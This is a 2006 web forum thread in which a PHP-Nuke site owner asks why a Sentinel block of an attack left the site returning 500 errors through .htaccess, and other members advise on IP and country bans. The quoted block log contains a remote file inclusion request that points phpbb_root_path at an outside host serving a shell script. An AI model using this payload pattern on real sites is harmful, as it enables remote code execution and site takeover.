| Author |
Message |
Gazanimal
Hangin' Around
Joined: Nov 29, 2005
Posts: 47
|
 Posted:
Fri Sep 29, 2006 8:42 am |
|
Hi guys.
I got an email notifying me that someone had made an attack on my website, specifically my forums & that Sentinel had repelled them. Good job 
However, after the attempted intrusion my website suffered a "500 - Internal Server Error" everytime someone tried to connect.
The email did shed some light onto the problem (which I've posted below) but I can access the website fine if I delete the .htaccess.
| Quote: | Date & Time: 2006-09-29 03:47:25 BST GMT +0100
Blocked IP: 72.20.3.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Query String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Get String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Post String: noegoclan.co.uk/web/modules.php
Forwarded For: none
Client IP: none
Remote Address: 72.20.3.58
Remote Port: 3277
Request Method: GET
--------------------
Who-Is for IP
72.20.3.58 |
As you can see they tried to use some kind of trojan script in a text file.
*WARNING* I'd not advise anyone to visit the url included in the email as my anti-virus picked it up & blocked it so be aware.
Also, the only thing in my .htaccess file is the IP of the attacker, nothing else.
In Sentinel I have it set to "Admin - HTTPAuth".
If I delete the .htacess from my website it works perfect, but before the attack it worked great & not had any problem. IS there something else wrong that is casuing the error?
Thanks for any help as I'm not a website guru & value the help.  |
| |
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Fri Sep 29, 2006 8:54 am |
|
kick out the ip..
72.20.3
that doesnt exist and is incomplete. |
| |
|
|
|
|
Gazanimal
|
| Posted:
Fri Sep 29, 2006 9:27 am |
|
The IP blocking config in Sentinel is set to:
| Quote: | | 1 Octet (127.3.4.*) |
Should I change it to full IP or add in the full IP of the hacker instead as I do have that?
I have Sentinel also set to write to .htaccess when someone is blocked but should I set it to not to write to .htacess? Will the IP still be blocked if not?? |
| |
|
|
|
|
srhh
Involved
Joined: Dec 27, 2005
Posts: 296
|
| Posted:
Fri Sep 29, 2006 9:33 am |
|
Hmm, I could be mistaken, but I think it's safer to leave the sub-net included in bans.
The banned IP will still be in the database too after you delete it from the htaccess file. |
| |
|
|
|
|
Gazanimal
|
| Posted:
Fri Sep 29, 2006 9:41 am |
|
I'm starting to think that my webhost doesn't like the use of .htaccess if I remember correctly.
I might need to alter my Sentinel settings to not write to .htaccess when an attack is logged & leave it included in the database.
So should I use Full IP or only partial? |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Fri Sep 29, 2006 11:35 am |
|
|
|
|
Gazanimal
|
| Posted:
Fri Sep 29, 2006 1:28 pm |
|
Cheers guys, I'll ban the specific user.
Is it easy to ban specific ranges of IP's for countries?Bearing in mind that I can't use .htaccess |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Sep 29, 2006 1:35 pm |
|
Cannot use htaccess?
If thats so i suggest you get another host.. |
| |
|
|
|
|
evaders99
|
| Posted:
Sun Oct 01, 2006 9:26 pm |
|
Yes it is easy to ban the entire country using Sentinel.
I don't know if .htaccess is being written too as well, but it is quite useful to ban on the server level. That would stop them from accessing anything on your site. Sentinel bans w/o .htaccess would only protect scripts running through phpNuke |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
